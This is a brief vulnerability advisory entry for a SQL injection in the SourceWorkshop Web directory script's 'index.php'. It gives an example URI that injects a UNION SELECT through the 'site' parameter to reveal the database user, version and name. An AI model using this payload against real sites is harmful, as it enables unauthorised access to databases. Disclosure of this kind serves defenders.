• info
• discussion
• exploit
• solution
• references

SourceWorkshop Web directory script 'index.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI has been provided:

http://www.example.com/Script/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())--